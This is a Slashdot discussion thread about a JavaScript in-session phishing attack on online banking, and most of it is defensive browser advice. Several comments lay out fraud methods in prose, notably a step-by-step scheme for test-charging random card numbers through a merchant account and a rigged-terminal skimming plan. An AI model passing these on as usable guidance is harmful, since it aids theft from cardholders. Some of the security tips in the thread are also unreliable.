Turns out that the domain was a legitimate provider of "outsourced chatbot-in-india" services. The stupid marketing motherfuckers at BAC were loading third-party Javashit so that n00b customers too stupid to figure out "login" and "password" could resolve their confusion by "chatting with a live person". In so doing, they exposed all of their customers to risk, because one required Javashit to log into the damn site in the first place. I uttered a few more oaths too foul for even the tender ears here, and blocked the goddamn domain just out of spite.

Anyways, you're right in that the root cause of this problem isn't n00bs who don't know how to install something like noscript. The root cause is the clueless twats at the banks, who disallow logins from users with Javashit deactivated.

Seriously, you don't need Javashit to accept an entry - be it login, acceptance of a third-factor authentication, or a password - in an https:/// form.

Don't use Javashit on the login page, and then users won't have to turn enable the security hole in order to log into the website.

Re:Simple Solution...

"register WITH noobs"

damn, I wish I had proof-read that last commie.

Re:Simple Solution...

[delvsional]

Also like a handgun, most tools don't care who is issuing the instructions - they just do it. That tablesaw doesn't care if it's a 2x4 or your forearm, it saws anyways.

Most table saws anyway.

http://www.youtube.com/watch?v=CorOfxWfTU8

Re:Simple Solution...

[postmortem]

I do that practice, because I never know what other sites are doing. However this might not be sufficient for two reasons: 1. Well crafted site could manage to remain hidden after you navigate it, by simply having some event-driven routine that is called when user leaves page - we all have seen these popups when you leave the page. 2. Firefox is known to keep your viewed pages in RAM, even after you leave the site. I assume that this is well guarded and probably secure.

Re:Simple Solution...

[j01123]

Oh, and use NoScript!

Another simple change is to set dom.disable_window_open_feature.location to true. That should make it pretty obvious when a popup comes from source different than what it's claiming.

Re:Simple Solution...

[calmofthestorm]

HOW CAN I INSTALLS NOSCRIPTS ON MY WINDOWS MICROSOFT EXPLORER VISTA? KTHANKSBYE!

Sarcasm aside, that's not going to cut it. We may be in an arms race, but we do need to try to keep up. The internet should not just be for technogeeks any more than medicine should be only for doctors. But I guess you can argue that this is like a doctor telling you to eat well, excercise regularly, and lose Windows--erm, weight.

Re:Simple Solution...

[Cato]

Thanks for the tip. At least for Firefox 3 on Linux, this is set to true by default.

Re:Simple Solution...

Nice of you to help other people Klootzak.

Sorry, couldn't resist;)

(For non dutch people, Klootzak=asshole/dick/very bad person/smeerlap)

Re:Simple Solution...

Ironically, the bad guys can skip the internet browser step all together. Because that's just how secure the banking and credit system is in the U.S.

1. Establish a small company. Preferably one that deals in non-tangible services.
2. Operate this company in a pretty low key and legal manner for about a year.
3. Get approved to charge on credit and debit by the major institutions. (This step is important!)
4. Sample random account and credit card numbers. Bill them a very small fee like $1 to $2, so if it bounces back it's no big deal.
5. Keep track of the accounts and numbers that do go through. Put them under a billing program that charges $10 to $20 per month.
6. Grow your company by adding branch subsidiaries. The more convoluted and less tracable to the parent company the better. Operate in same manner as steps 1 through 5.
7. When expanding, hire temporary workers that are only minimum wage. Treat them like dirt. Or do work-from-home programs. Make sure they stay minimum wage and clueless. This is how you expand while minimizing accountability.
8. ??????
9. Profit!

By charging small fees, it seems the credit card companies and FTC can be kept pretty ignorant. Also small fees are likely to be ignored because they hide easily amongst all kinds of service charges. Only people that are vigilant will catch this stuff, so small fees by charge-backs aren't the worst things for your operation. The feds go after fishy stuff that happens in big numbers. The fishy stuff that happens in small numbers is just as profitable, because you're hitting so many people at once with this scheme. (And it works exactly like that hack to the accounting program in the movie Office Space.)

Because schemes like this do seem to work, it's fairly obvious that banking and credit networks are insecure by default. (Banks and credit cards really need to implement a pre-validation scheme for approval of online charges, or some similar security system.) Right now there's no need to have the victim also get tricked by a middle-man method. Just roll random numbers once you're in the system and see if the charges stick. It's no harder than building a valid phone list by cold-calling and seeing if there's an answer.

Re:Simple Solution...

Computers are tools.

No, you're a tool!! I'm a computer you insensitive clod!

Re:Simple Solution...

[quintessentialk]

Yelling "Install NoScript you n00bs!!1!" won't register noobs... because they're newbs.

And if they were to install noscript, they wouldn't have the skill or patiance to configure all the exceptions, and would complain to you about their broken Internet.

Am I the only one on Slashdot who thinks javascript is a powerful tool adds much more to the web than it risks? I mean, sure, cutting off your arm is a great way to reduce the risk of fingernail infection, but who would want to do that?

And it's been there all of these years

[SpaceLifeForm]

Funny how I got a Flash ad thrown my way when I visited the link.

Re:And it's been there all of these years

[stonedcat]

Change all your bank accounts and destroy your computer quickly! The bad guys are gonna get ya!

Things to learn from this.

[john.picard]

The next thing you know, they'll make up a screen scraper in JavaScript. There are several things to learn from this. For the users, one, that you should completely clear your browser (Clear Private Data or similar) before going to a banking website, two that you should NEVER open other websites (or have them open) while you're signed in to a banking website, third that when you've finished banking, you should completely clear your browser again. For the browser makers (Firefox devs reading this?), third party cookies should be disabled by default, the option to turn them on should come with stern warnings, and each website can ONLY read cookies previously set by itself. Further when an encrypted page is opened, its memory should be such that other pages cannot access any part of it. In other words, the same sandboxing approach taken to deal with other security issues, within the browser for encrypted pages.

Re:Things to learn from this.

[Fian]

Perhaps it is time to have a dedicated banking browser? One that does not use cookies/cache data/allow more that one tab etc etc

Re:Things to learn from this.

[sonamchauhan]

Does Google's Chrome browser do something to this effect? I recall something about Chrome each webpage in an independent process, not as independent threads.

Re:Things to learn from this.

[Fian]

Haven't really looked at Chrome but I'd assume each process (tab) would still be looking at a centralised cookie cache.

Re:Things to learn from this.

[ljubom]

It would be cool to have firefox "mode" doing exactly this. Press an "online-banking" button and a new isolated firefox session would be started with all needed restrictions and settings.

Re:Things to learn from this.

[failedlogic]

I try and shy away from online-Banking as much as I can. Never mind separate browser. I use a Live Linux DVD and load up my bank site from there. When I do this its boot, bank website, print if necessary, shutdown and back to Windows.

Re:Things to learn from this.

Each process has its own session, so session cookies should be safe.

Re:Things to learn from this.

[labnet]

Or you should get a one time key generator.
My key changes every 60 seconds. Could they exploit this within that time frame. (Especially if I'm already logged on and the bank does not allow a second simultaneous login)

Re:Things to learn from this.

[OpenSourced]

I, for one, have a dedicated VMWare virtual machine with Ubuntu installed, and Firefox. Firefox has NoScript installed, is set to saving no user story, and I use it only for banking. I find the setup a bit unwieldy sometimes, but is sure safer.

Re:Things to learn from this.

You're paranoid.

Re:Things to learn from this.

[guruevi]

If the cracker is technical enough, yes they can. Again, you would have to have a dodgy site on one site, banking on the other (porn & banking, a good combination) then as soon as the JavaScript detects that it has access to the other page, it can start 'clicking' stuff from the other website and while you're logged in transfer $ from your account elsewhere or just request the page that has your account numbers on it and send it to a server somewhere.

Re:Things to learn from this.

[fprintf]

I'd bet this is something that could be created in GreaseMonkey or otherwise developed as an add-on for Firefox. It would certainly be an effort I would contribute to as this discussion is making me paranoid.

Re:Things to learn from this.

The advantage here is that if your bank supplied you with software for banking (browser or otherwise) then the exchange of public keys could be done in a secure fashion (ie. I can trust this disk handed to me by my banker).

The software would be set up to only trust the specific sites created by the bank providing it, and would allow no information access into/outof the browser (sadly, key-loggers could still hit ya).

Seems that this could be fairly easily (for software definitions of easy) branched from firefox, which would also mean that once a bank did it that all other banks could easily copy it (which might be why no banks are trying yet), thus quickly the arena of online banking could become more secure.

Re:Things to learn from this.

[Jeremi]

It would be cool to have firefox "mode" doing exactly this. Press an "online-banking" button and a new isolated firefox session would be started with all needed restrictions and settings.

That would indeed be quite useful. I'd put a button just like it into my JavaScript; clicking it would take you directly to my phishing site.

Re:Things to learn from this.

[Jason+Levine]

Perhaps this is a job for Prism? Have your bank's site run inside a Prism session, completely unconnected to any other website. I do this with Google Reader mainly because I like the increased screen space I get over FireFox (don't need tabs and such taking away screen space). I just launch my Google Reader Prism shortcut and away I go.

Re:Things to learn from this.

[CmdrPorno]

Safari has Private Browsing for banking, or for porn, but apparently not for both at the same time.

Re:Things to learn from this.

I don't think you have any idea what you are talking about. How does the attacker's script get access to the bank's website? Scripts can't just do things on other sites because you have a browser window open. Same origin policy

Re:Things to learn from this.

bull fucking shit. you're impressing nobody

Re:Things to learn from this.

[badkarmadayaccount]

I think Incognito mode window is what you are looking for.

Use a separate Firefox profile for banking

This is why I use a separate Firefox profile for banking and bill paying. And I only have one tab open at a time.

The article doesn't describe the actual exploit

[dmomo]

The only way I can imagine that js on one site can detect if a user is logged into another (assuming the other site is secure and I cannot post js to it) would work like this:

Use an Asynchronous request to "curl" out to a well known page of that site and then "grep" the response for typical "you are not logged in" text. If it is not found, commence shenanigans.

BTW, this comment kind of made me roll my eyes:

"Klein says placing a low-profile piece of malicious JavaScript on a high-profile Website isn't difficult to do, and the malware is basically invisible to the user."

"Klein" makes it sound like this is a walk in the park. I don't know. After the myspace worm a few years back, I think validation and filtering on those sites has gotten pretty good. Low-profile sites? Sure. High-profile sites? Not so much. I'm not saying it's not possible, but "not difficult"... maybe Klein is just conceited.

Re:The article doesn't describe the actual exploit

[The+MAZZTer]

It's called Cross-site scripting. Except in this case I don't think XSS exactly describes the type of attack we see here.

Re:The article doesn't describe the actual exploit

[SlashRSlashN]

"cURL" out to those sites?
Sir, if we had the credentials needed to send a cURL request with your cookies (to see if you were logged in), you've already been hijacked. (cURL requests are server-side.)

The vulnerability comes more from the fact that some browsers let JavaScript "see" what the URL of another window is.

Oh, that, and many people won't notice that the URL isn't form their bank.

Funny, though. A modern pop up blocker will stop this 9/10 times (unless you do the infamous body.onclick trick).

Re:The article doesn't describe the actual exploit

[dmomo]

I agree. Most XSS attacks would require the banking site to have a vulnerability. This article implies that all one needs is a vulnerability on the first (high-profile) site.

Re:The article doesn't describe the actual exploit

[blueg3]

It's true. There's been quite a bit of research into it, mostly at Google. While you might not be able to pick a particular high-profile site and sneak JavaScript onto it, getting your JS onto "high-profile sites" in general is not difficult.

Re:The article doesn't describe the actual exploit

[sugarmotor]

What if the cookie of the target site is against a host name such as

http://094ec182f4a74bc1382206407.bank.com/

The attacker would not waste their time trying to guess the (randomly generated) 094ec182f4a74bc1382206407 part.

So when you login your logging in with a host name with a token.

Stephan

Re:The article doesn't describe the actual exploit

[Terrasque]

That's actually a pretty interesting idea. They could for example allocate *.in.bank.com for this purpose.

This would of course have to be in addition to all other security layers.

Re:The article doesn't describe the actual exploit

[Emb3rz]

Interesting, but hardly to be considered comprehensive.

It's easy enough to parse just the root domain and other telling parts of the URL for sites that attempt to use 'security' of that sort.

Re:The article doesn't describe the actual exploit

[citizenr]

https://developer.mozilla.org/En/Same_origin_policy_for_JavaScript
http://en.wikipedia.org/wiki/Same_origin_policy
cant just grab pages at random in javascript

Not common yet.....?

[biocute]

From the friendly article: although he and his research team have not spotted full-blown attacks like this in the wild as yet

I'm sure they will now after this.

Already dedicate browser sessions to banking only

[Raul+Acevedo]

I already make sure that if I'm going to visit my bank, I close my browser, start a new one, do the banking thing, then close the browser before I do anything else. While banking I don't browse other sites.

I figured an attack like this was possible but had no idea there was a way to check other sites you are visiting via JavaScript. That seems like a very obvious security flaw. Anyone know how that is possible? Is it via standard JavaScript, or does it require a bizarre hack that happens to work on today's browsers? The article doesn't say.

Is Chrome vulnerable?

[olddotter]

I wonder if Chrome's idea of running each tab in a separate process makes it less vulnerable to this type of attack? I suspect that it is much harder for there to be a cross tab or cross window attack via Javascript it each has its own full process.

maybe being obsessive pays off

[NotQuiteReal]

I always see folks bitching and moaning that FireFox burns memory... if you leave it open all day. Why would you do that? I must open FireFox 50 times a a day, and never complain about the extra 1.5 seconds it takes to do that, at least I know I have a "fresh start".

Often, I also delete all the cookies too, just because I am a neat freak, not due to paranoia. Maybe I get more secure sessions as a side effect.

Anyhow, keeping your kitchen neat and clean is healthy. Maybe keeping your computer neat and clean is more secure. Sometimes, a reason like "because I said so", works out to be a good thing, even if the reasons are not articulated.

Re:maybe being obsessive pays off

[Spacejock]

For some reason, FF 3.0 freezes for about eight-ten seconds after I start it up, every single time. It's very, very irritating, and the behaviour encourages me to leave it open as much as possible. (This never happened with FF 1 or 2)

I have a dual core cpu with gigs of ram, so it's not a hardware issue. Running another profile (with few bookmarks) on the same PC doesn't exhibit the same problem, and I can only assume it's the browser rechecking links, favicons or something else every time I start it up. (places.sqlite is 31mb)

I disabled the url security thingo which reads/writes the 10mb urlclassifier2.sqlite file, but that made little difference. I guess I could delete 90% of my bookmarks, but I really don't want to do that.

Re:maybe being obsessive pays off

[rickb928]

There are some limitations to that scam:

- You will have to deposit the funds into a merchant account. Be assured they will come calling when your fraud rate goes sky-high. Your bank also.

- Most terminals need to be programmed correctly. This includes merchant-specific data. The attempt, if it is caught, will identify the merchant, and the previous advice kicks in.

- While banks aren't as diligent in tracking ATM fraud, the crdit card processors and issuing banks do take cc fraud seriously, and you will need to move the money very quickly. Which the bad guys do do...

I guess my re-install of XP will include a VM and Ubuntu in there. Can't be too sure.

New ways to steal.

[dinther]

Are you kidding? Internet security clowns have a very limited imagination. They go nuts on securing one aspect beyond usability while completely ignoring other areas.

Here in NZ there is a problem with ATM machine skimmers. Criminals equip the ATM machine with camera and fake card reader and collect card and pin codes from unsuspecting users after which they raid their bank accounts.

So everyone is worried about this now. Yet, the most popular form of electronic payment in shops in NZ is the user of a bank card combined with a pin code (EFT Pos).

I user it all the time to the point that I rarely see cash. Yet, it only takes a single merchant borrowing a mobile EFTPos installation to skim as many cards as he wants.

Simple. Grab a card reader, fake entry terminal and a simple micro processor and sell some stuff cheap so you get many customers. Add a simple bit of programming. The client payment experience is the same on the fake payment system and they won't pay any attention. After all they are not pulling cash out of a machine but are excited making a payment for a deal too good to be true. No need to suspect anything, after all they walk away with the goods. You collect the card data and pin code and make the same transaction later. Now you either sell on the card data or use it to make small payments or large payments as long as you can get away with.

Unlike ATM machines, Equipment for electronic bank transactions in shops are completely in the hands of the vendor and totally open to abuse. Yet nobody worries about it because it has not happened or had not been detected to the extend that the media jump on it.

And don't get me started on credit cards.

Re:New ways to steal.

[sincewhen]

Yes, it is apparently already being done on a large scale:
http://www.telegraph.co.uk/news/newstopics/politics/lawandorder/3173346/Chip-and-pin-scam-has-netted-millions-from-British-shoppers.html

Re:New ways to steal.

[carnalforge]

Well, here in Italy at least when i pay or get cash with my card some seconds a while i get an sms telleing me how much money got spent and where. Sure it does not stop people from stealing from my account but at least i get to know it really soon.
And as for online banking, to access my account i have to put a username, a password choosen by me and a code generated from an electronic key which is valid just for 30 seconds.
Of course, the best defense is knowledge obviously.

thus making the web suck ass

[r00t]

Half my desktop or more is web. These days you
can use the web for spreadsheets, word processing,
email, chat, and so on.

Closing all those windows would suck ass.

The browser damn well ought to isolate the
web sites 100% from each other. WTF?

Instead, the damn thing frustrates any attempt
at manual isolation. If I try to start a second
instance, that one does some retarded RPC thing
to have my other browser instance spawn the new
window -- and then that second instance exits!

It's not even fail safe. Crash in one window,
and all the windows go.

IMHO, a retarded bovine could get security right.
It took real effort to fuck things up.

Re:thus making the web suck ass

[SleepyHappyDoc]

Are you suggesting I shouldn't be able to cut a link from one window and paste it into another? What about legitimate cross-site scripting, like using your Facebook account to comment on Gawker Media blogs? It's not nearly so black-and-white.

Re:thus making the web suck ass

Nobody wants to disallow cut and paste. What a straw man.
And if site A wants me to use my account on site B, it should ask me for my OpenID. There's nothing legitimate about login info (and logged-in state is login info) being shared automatically between browser tabs, without even an option to disable it.

Re:thus making the web suck ass

[fmobus]

I could be wrong, but there is nothing keeping OpenID admins from faking your login and telling site A they are you. OpenID is not reasonable for banking applications. But anyways, internet banking has been so fucked up for so long that I can see crap like that coming.

Also, proper security for online banking should never require kludges like Java Applets or client-side "security checkers", as I have seen in my country's banking.

A login page should be a very normal login page, followed by a One Time Pad request (alternatively, OTP could be requested only for non-idempotent transactions). This is simply the best solution - any bank that neglects that is stupid. OTP can be implemented in various ways... digital keyfobs are surely the best, but even a sheet of paper with a table of codes will do the trick.

Re:thus making the web suck ass

Instead, the damn thing frustrates any attempt at manual isolation. If I try to start a second instance, that one does some retarded RPC thing to have my other browser instance spawn the new window -- and then that second instance exits!

THIS.

Huge pet peeve of mine.

For the love of "Bob", why isn't there a "mozilla -launchmeinanewprocess" flag. It doesn't have to be (and given the obvious consequence to the n00bs, probably shouldn't be) the default behavior, but sometimes I really do want two copies of the damn thing resident in memory.

Re:thus making the web suck ass

[SleepyHappyDoc]

How is what I said a straw man? He said 100%, I was asking how much of 100% he meant.

Re:thus making the web suck ass

I'd prefer to be sympathetic since it's fun to bash Microsoft, but honestly, why are you trying to do *everything* with a generic interface that was never intended to do *any* of those tasks? It's a web browser. It is for, get this, browsing the web. A word processor on the other hand, is for writing and editing documents. An email program is for *gasp* sending and receiving email! How many times has my word processor crashed my email? Never. When was the last time a chat session interfered with my budget spreadsheet? Never. How do I possess such magical ability? It's called not being retarded.

Re:thus making the web suck ass

[r00t]

For cut-and-paste, it depends on how the operation
is controlled. The web sites must not be able to
freely read and write to a shared cut/paste buffer.
It has to only operate under user control.

(ideally with OS-level trusted path, but for now
we can settle for decent browser control)

I'm not so sure there is legitimate cross-site
scripting. Possibly it's OK to have web sites
specify trusted peers. Possibly it's OK to have
an anything-goes policy for unencrypted sites.

Damnit

[freddy_dreddy]

My father warned me about this. Hate it when he's right.

more fixes for the security model

[r00t]

Any browser window containing content from more
than one security context must NOT display any
sort of lock icon, and must display a warning
banner.

"more than one" would include an https site that
uses some http images. It's not secure if it's
a mix.

Re:more fixes for the security model

[h4rm0ny]

Oddly enough, this is something IE7 did (by displaying a very annoying mixed-content warning) but which Firefox 2 did not by default (though you could turn it on). I'm not sure about Firefox 3.

The article makes it sound so simple...

[BUL2294]

From TFA: "Klein says placing a low-profile piece of malicious JavaScript on a high-profile Website isn't difficult to do, and the malware is basically invisible to the user."

I don't see how any well-designed high-profile site wouldn't account for the possibility it might get hacked, let alone not have an automated method for undoing the damage... A simple approach would be to generate an MD5 checksum from each file (i.e. ASP, JPG, flash) and compare it to the MD5 checksums of what they're "supposed" to be. Generate & compare every 15 or 30 seconds. If there's a discrepancy, copy the file back from a read-only source and send an administrative alert. Hell, it's a simple VBScript...

Re:The article makes it sound so simple...

[blueg3]

You don't need to hack a high-profile site to put malicious JavaScript on there. Most high-profile sites, directly or indirectly, load tons of third-party objects.

Advertising, for example, is an excellent JavaScript injection vector.

Re:The article makes it sound so simple...

[BUL2294]

True, but since the article specifically talks about banks, how many banks do you know of load 3rd party advertisements, especially on their online banking site? Sure, the bank might have some banner ads, usually for their own services like overdraft protection or mortgages, but no real bank would allow someone else to control even part of what appears to the end-user on their online banking site... You can bet that whatever banner ads appear are all hosted internally.

Re:The article makes it sound so simple...

[TerranFury]

The whole point of this exploit is that the malicious Javascript isn't on the banking site but on another site open in another tab or browser window. E.g., suppose you have your bank's page open in one tab and Slashdot open in another, and Slashdot loads third-party ads.

Re:The article makes it sound so simple...

[blueg3]

You don't need to have the JavaScript loaded through the bank's website. A user has two tabs or windows open: one to their bank, one to a popular site into which you can inject your malicious JS. The second, non-bank site can detect that you have logged in to your banking site and can display a popup prompting you for login information (which should cause you to be suspicious, but hey, this is phishing).

Injecting JavaScript into the bank's website is enormously more dangerous (but also already well-known).

Ban Pop-ups

[Spy+Hunter]

Yet another reason to ban pop-ups. IMHO Javascript should not be allowed to create, close, move, resize, or in any other way affect OS-level windows, period. That includes modal dialogs like alert popups and that "do you really want to leave this page" dialog.

Re:Ban Pop-ups

[robo_mojo]

Javascript alerts would be fine, as long as they would stay only with their own content and not interrupt other tabs/windows or other programs on the system.

There is a very long-standing bugzilla bug about this for Mozilla, you can read:

https://bugzilla.mozilla.org/show_bug.cgi?id=59314
  Bug 59314 - Alerts should be content-modal, not window-modal

(comment #39 describes a security problem that sounds similar to the problem here)

Lots of good ideas in that page about how alerts could be handled differently. I like the one where the alert becomes an infobar. If you aren't on that tab when the alert happens, you won't be forced to see it, and it can't interrupt anything else you're doing.

In the meantime, closing all open browser windows before you visit your bank site is still the safest thing to do.

Re:Ban Pop-ups

[Spy+Hunter]

Yes, I would be quite happy indeed if 59314 was fixed. However, the reason it's 8 years old and not fixed is the problem runs deeper than the UI chrome; it extends into the platform. An alert can happen anywhere in a website's code, and the stack can be filled with all manner of strange calls in and out of Mozilla's guts. Pausing the entire application until the alert is dismissed is easy, but if you tried to suspend one page and continue running others, all the half-finished calls waiting on the stack would cause problems.

I guess it would be fairly trivial to make alert() non-blocking since it doesn't require user input, but there are other dialogs that do require user input and to fix the exploitability of dialogs you have to fix them all. The real fix is either to make Mozilla's DOM completely thread safe and run pages on different threads, or go to a process separation model like Chrome and IE8.

you don't use web email

[r00t]

You might have an account, but you certainly
aren't depending on it and getting lots of
email through it.

A 'secure mode' for browsers?

[dnwq]

Internet Explorer has a porn^H^H^H^H privacy mode where privacy settings are locked down. Why not build an analagous 'secure mode' for Firefox or Konq. where security settings are all locked to high heaven for that browsing session only?

That way users can both bank online securely and not have half the web break for them because they've disabled javascript.

Re:A 'secure mode' for browsers?

[Cigarra]

The "private" mode is expected to arrive with Firefox 3.1 :-)

Re:A 'secure mode' for browsers?

For Firefox there is already the Stealther add-on which provides the same functionality

popups

[DeadDecoy]

What about just implementing a general pop-up blocker? If something actually does pop-up, and you don't get the request that it's from such-and-such a site, you know something fishy is going on. Anyways, I think there are two problems that exist here. The primary one is user education. More aware users may be harder to con unless by a very direct fishing attack. The second would be to standardize how sites can transmit secure information. I don't mean just encryption, but perhaps have a standardized protocol that all sites must go through to get your information. I.e. no popups, visit their site, validate their url location. Some of this probable wouldn't work, but it might be useful to consider.

Oh those nasty promiscuous cookies

Why is there no way to restrict session cookies to the tab that set them and its spawns? Or does Chrome do that? It's well known that a site doesn't need direct access to a cookie to check for its effects.
A quick search turned up an extinct Firefox extension that seems to do this: CookieStore. It should be default behavior of browsers.

Of course there is a technical solution

[Ed+Avis]

I believe there is a technical solution to this attack and to other attacks. But if a technical solution does not exist, then online banking is inherently insecure and should not be used by anybody.

In this particular case: (a) block Javascript in different tabs from seeing what sites you are visiting, and (b) all popups should be clearly labelled by the browser with what site they came from. If it's an SSL site with an extended-validation certificate, then show the company name in large writing at the top. If not, display a clear visual indication that it's from an unknown site. Personally, I think some kind of Microsoft Bob style assistant could give non-technical users the hint they need to understand that a page or popup is not from their bank, even though it may display the bank's logo inside the page. The assistant should appear next to the popup window with a suspicious look, and require extra confirmation before entering data into an unknown popup if you have a secure site open.

I thought I was paranoid

[zeldorf]

I always close all my other browser windows when I'm using online banking, and start with a fresh Firefox session (set up to clear everything on shutdown). I thought I was just being paranoid, turns out not so much!

The best security I've seen my bank use is an external hash thing that looks like a small calculator. You have to stick your card in, enter your pin, enter a bunch of numbers and you get a code back to enter into the site when you transfer money. Surely that kind of security would render this sort of scam pointless?

Re:Already dedicate browser sessions to banking on

[totally+bogus+dude]

It's explained in a few comments above. You just reference a resource (usually an image) that requires you to be logged in at the target site in order to access. If your attempt fails, the user isn't logged in at that site. If it succeeds, you know the user is currently logged in.

Re:Schools!

[TaoPhoenix]

Thats's awesome!

So some Terrorist could live inside a locked school broom closet for years hosting hacking stuff! Who'd ever accuse a school of Not Thinking Of Children??

Re:AI

[TaoPhoenix]

Both.

With semi-apologies to certain TV shows,

"My mother was a prototype from an AI lab and gained all the lexical parsing rules and dictionaries. My father was a real-time self modifying system born out of the cyber wars. It's the unification of both that made me possible."

paranoia-plus...

[BrokenHalo]

My paranoia has led me into a practice of doing my banking in a single browser session, clearing cookies, cache and history before and after, and closing/restarting the browser when finished.

Looks like I was right about the monsters behind the sofa after all.

Re:paranoia-plus...

[stranger_to_himself]

My paranoia has led me into a practice of doing my banking in a single browser session, clearing cookies, cache and history before and after, and closing/restarting the browser when finished.

My paranoia has led me into a practice of doing my banking by going to the bank.

Re:paranoia-plus...

SSL is far more secure than going to the bank and dealing with humans.
Also, I have never heard of anyone dieing in a digital bank robbery.

Re:paranoia-plus...

Yo Dawg, The Phishers here,

We put a bank in yo bank so you can bank while you bank while we phish.

Re:paranoia-plus...

[eat+here_get+gas]

because most bank robbery's do not occur in tooling shops.

dieing indeed....

Re:paranoia-plus...

[RulerOf]

My paranoia has led me into a practice of doing my banking by going to the bank.

Indeed.

If I'm not on my own computer, I just call them.

If your bank doesn't have a number you can call to check your balance or transfer funds, you should probably switch banks.

Re:paranoia-plus...

[SkyDude]

My paranoia has led me into a practice of doing my banking by going to the bank.

You insensitive clod. How do you get there - in your gasoline powered, carbon-emitting, smog-making car?
A real /.er would stay in his basement and do his banking on the internet and not risk having to interact with other humans.......

You must be new here.

Re:paranoia-plus...

[Intron]

Good idea. I just called your bank and transferred $10,000. Worked fine.

Re:paranoia-plus...

[RulerOf]

You do realize I was making a point about viability of phishing over the phone vs. through a web browser, right?

Re:paranoia-plus...

[reallocate]

Yesterday, I telephoned one of my banks to cancel a dormant account. They're mailing me a check. All they wanted to know was the account number, my birthday, and my current address.

If I'm your friend, know when you were born, and you ask me to grab your mail while you're out of town, I can open that bank's statement and grab your cash.

Re:paranoia-plus...

[hierophanta]

its just unfortunate that the internet banking systems we use dont automate that level of security.

personally i'd rather download a small application to do my banking - that way i can be sure that the transactions are being isolated (with a different port etc..)

Re:paranoia-plus...

[cadience]

I have two virtual machines for this. One for secure purchasing/banking and one for surfing. (Usually have only one window open when doing transactions, though this is is a good practice to implement. I role back to a fresh image every month or so.

Re:paranoia-plus...

[FrozenFOXX]

My paranoia has led me into a practice of doing my banking by going to the bank.

Normally I'm with you on this but at least in America there's a nice, large, customer-friendly "bank" that tens of thousands of Americans rely on, mostly because it's run like a credit union that happens to be a bank...one that isn't hemorrhaging money, either.

It's USAA. And sadly, awesome a bank/insurance company as USAA is, its only physical location is in Texas and they do everything else by either phone or online. This is particularly important since you have to be, be married to, or be a direct child of a US Military Service member to be a member of USAA, which means more than likely you're like me and have been stationed overseas where it's impossible to actually go to your bank. Even if USAA had thousands of locations across the country they're not exactly going to go to Afghanistan and set up a branch.

So while yes, when I was a member of a local credit union (something I HIGHLY encourage people to get involved in, they are a whole different animal from a bank if set up right) I'd prefer to just schedule 15 mins out of my day once a month to go down and do my banking, there's a very, very large portion of us who simply cannot physically do that.

Re:paranoia-plus...

[OolimPhon]

personally i'd rather download a small application to do my banking - that way i can be sure that the transactions are being isolated (with a different port etc..)

That seems to work well for the South Koreans. Except as a consequence they are overrun with ActiveX exploits. And don't say "I run $OS", Korean banks won't deal with you online if you don't run Windows and therefore can't accept ActiveX.

Re:paranoia-plus...

[Hurricane78]

Why on earth would you do your banking in a browser???

Don't you have an HBCI equivatent? I've had it since before 2000. And I have a class-2 chip card reader since I think 2002 too!

Get out of the dark ages!

Re:paranoia-plus...

[CheshireDragon]

SSL is far more secure...

Prove it AC.

Re:paranoia-plus...

[BrokenHalo]

Why on earth would you do your banking in a browser??? Don't you have an HBCI equivatent?

No, I don't. Until I saw your post, I had never heard of HBCI, and having done some googling, I have not found one Australian bank that supports it.

In any case, how is this more secure than https in a standalone browser session?

Re:paranoia-plus...

[mactimes]

I've learned some tips from a general security consultant while he was being interviewed on a TV show.

I don't remember all of it, but one of the tips I remember by heart is: Always insert the wrong password first. Then, you go back and put the correct one. If there is anything "listening" to your password, it will catch the wrong one. I don't know how effective this can be, but you know, any defense you can use is worth when it comes to your security.

Re:paranoia-plus...

[RockDoctor]

And don't say "I run $OS", Korean banks won't deal with you online if you don't run Windows and therefore can't accept ActiveX.

Oh, I'll remember that if the job in North Korea ever comes up and I find that I need to set up a separate bank account to move the money into the rest of my accounts.

Javascript *is* a typical attack vector

[Toffins]

Here's the novel part of it: it doesn't involve any of the typical attack vectors we all know and love. Instead, it uses JavaScript ...

Anybody who knows the history of security vulnerabilities in browsers knows that Javascript itself is the all-time-best attack vector. If Javascript is enabled in any browser, that browser can be immediately compromised when you visit a compromised website. There are latent epidemics of Javascript zero-day vulnerabilities in all browsers.

Want much better security in your browser? Just disable Javascript. Learn to dislike Javascript. I have yet to see any website whose information could not be equivalently usefully displayed without any Javascript. Every time Javascript's "interactivity" is celebrated, critical reading dies another death. Don't regret losing all the "interactivity" of Javascript. There are far too many bad developers who write websites that require Javascript. Turn the tide. Reject Javascript for the toxic waste of space that it is.

Related attacks are well-understood

[gqx]

It is understood and discussed in much detail that browsers disclose a privacy-related state information across unrelated domains. Most of these problems are unavoidable with the way how HTML and HTTP are designed. Some prior references include:

• A presentation by Billy Rios and Chris Evans
• A whole section in "Browser Security Handbook"

With no other specific information released to the public it is difficult to say if this report merely reiterates one of these problems, or discusses a new vector; but regardless of this, it is a well-understood property that users sadly need to live with for the foreseeable future.

No passwords

[Haiyadragon]

Over here in the Netherlands most banks (maybe all) don't use passwords. In my case I have a card reader that will generate a code after I give it my card, PIN number and a code generated by the website. I have to do this to log in and to initiate transactions. That makes this attack pretty useless. Also, a prompt should always clearly indicate by which website it was called and it shouldn't block other tabs.

Re:No passwords

[LingNoi]

Surely banking would be much safer if there was a public key for the bank and a private key for the card stored on the card. The bank would have the private bank key and public card key.

Then you could use a card reader to create encrypted messages to send to the bank.

Although it doesn't deal with the problem of if the bank's key gets compromised. They'd have to recall all the cards..

Re:No passwords

[Culture20]

This attack still works. The attacker/script notices you're logged in, attempts to log in to bank.co.nl, sends you the code from the website, you enter you PIN & the card, then give the attacker/script your card reader's response. The criminal uses the response to access the website (this one time) as you.

Re:No passwords

[LM-Els]

This attack still works. The attacker/script notices you're logged in, attempts to log in to bank.co.nl, sends you the code from the website, you enter you PIN & the card, then give the attacker/script your card reader's response. The criminal uses the response to access the website (this one time) as you.

problem still, that for every single payment you want to do, you need to enter a new code to confirm. How would the attacker be able to use your code to make a payment that you haven't initiated first?

Re:No passwords

[Culture20]

New popup: "Username or Passkey invalid, please try again."

Re:No passwords

[LM-Els]

And then what? If the popup is fake (which it is because the bank does not use popups at all, but let's just forget this for argument's sake), it means that the passkey I gave in already had effect, and this means that it cannot be reused. For every single thing I need to do, I need a new passkey. And every new passkey is sent to my mobile phone by the bank. When there is no confirmation to be given for a transaction, no passkey is sent to the phone.

How can Chrome be affected by this?

[LingNoi]

I noticed that Chrome 2.0 isn't affected by this however I have to ask the question..

How can Chrome be affected by this in the first place? Isn't the whole point of Chrome that it's sand boxed in and unable to get information from other tabs.

